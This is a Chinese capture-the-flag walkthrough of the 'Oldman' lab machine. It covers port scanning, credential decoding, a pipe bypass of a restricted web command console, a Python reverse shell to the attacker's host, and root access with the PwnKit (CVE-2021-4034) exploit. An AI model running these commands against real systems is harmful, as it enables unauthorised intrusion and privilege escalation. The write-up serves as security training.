Oldman

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-24 14:55 CST
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00044s latency).
MAC Address: 08:00:27:8B:9E:BA (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.16
Host is up (0.00058s latency).
MAC Address: 08:00:27:C5:75:79 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.14 seconds

靶机IP：192.168.2.16

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.16                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-24 14:55 CST
Nmap scan report for 192.168.2.16
Host is up (0.00080s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:C5:75:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.74 seconds

2.详细信息扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p80 192.168.2.16 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-24 14:56 CST
Nmap scan report for 192.168.2.16
Host is up (0.00080s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: HYH
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:C5:75:79 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.01 seconds

3.udp扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap -sU --top-ports 100 192.168.2.16                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-24 14:56 CST
Nmap scan report for 192.168.2.16
Host is up (0.0011s latency).
Not shown: 55 closed udp ports (port-unreach), 44 open|filtered udp ports (no-response)
PORT     STATE SERVICE
5353/udp open  zeroconf
MAC Address: 08:00:27:C5:75:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.81 seconds

二、WEB渗透

访问80端口，发现一个图片，有可能是一种加密方式

1、足迹字母表

经过查询，发现上面的加密方式是足迹字母表

经过对比，解密出结果为：HYHFOREVER

2、目录扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# dirsearch -u "http://192.168.2.16"       
...
[15:04:53] 200 -    1KB - /login.php
[15:04:53] 200 -    1KB - /login
[15:04:54] 200 -    1KB - /login/
[15:04:54] 200 -    1KB - /login/admin/admin.asp
[15:04:54] 200 -    1KB - /login/admin/
[15:04:54] 200 -    1KB - /login/cpanel.php
[15:04:54] 200 -    1KB - /login/administrator/
[15:04:54] 200 -    1KB - /login/cpanel.jsp
[15:04:54] 200 -    1KB - /login/cpanel.aspx
[15:04:54] 200 -    1KB - /login/cpanel.html
[15:04:54] 200 -    1KB - /login/cpanel.js
[15:04:54] 200 -    1KB - /login/login
[15:04:54] 200 -    1KB - /login/index
[15:04:54] 200 -    1KB - /login/cpanel/
[15:04:54] 200 -    1KB - /login/oauth/
[15:04:54] 200 -    1KB - /login/super
[15:04:54] 302 -   20B  - /logout  ->  login.php
[15:04:54] 302 -   20B  - /logout.php  ->  login.php
[15:04:54] 302 -   20B  - /logout/  ->  login.php
[15:05:15] 403 -  238B  - /server-status
[15:05:15] 403 -  238B  - /server-status/

Task Completed

访问/login，找到登录界面，根据上面获取到的凭证：hyh:hyhforever进行登录，成功进入到终端管理页面

3、限制命令绕过

提示只允许执行ls, pwd, whoami, id, date, uname, echo, cat这几个命令，经过尝试，发现可以使用|进行绕过，执行后面的命令

三、获取www-data权限

使用Python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

成功获取到shell

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nc -lvnp 4444     
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.16] 56633
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

稳定shell

python -c 'import pty;pty.spawn("/bin/bash")';
# 按下 Ctrl+Z 将其挂起
stty raw -echo;fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取hyh权限

根据上面获取到的凭证hyhforever，成功切换到hyh用户

www-data@Oldman:/tmp$ su hyh
Password: 
hyh@Oldman:/tmp$ id
uid=1000(hyh) gid=1000(hyh) groups=1000(hyh)

2、获取root权限

使用linpeas查看，发现存在内核提权漏洞

查看系统内核版本

hyh@Oldman:/tmp$ uname -r
3.11.0-15-generic

利用脚本
https://codeload.github.com/berdav/CVE-2021-4034/zip/main

make文件

hyh@Oldman:/tmp$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

获取到root权限

hyh@Oldman:/tmp$ ./cve-2021-4034          
# id
uid=0(root) gid=0(root) groups=0(root),1000(hyh)

五、获取FLAG

# cat /home/hyh/Desktop/user.txt /root/root.txt
flag{user-11a951681e76cf2cb51896e29916cf4d}
flag{root-e5ef24d17e710f36179588a66b667197}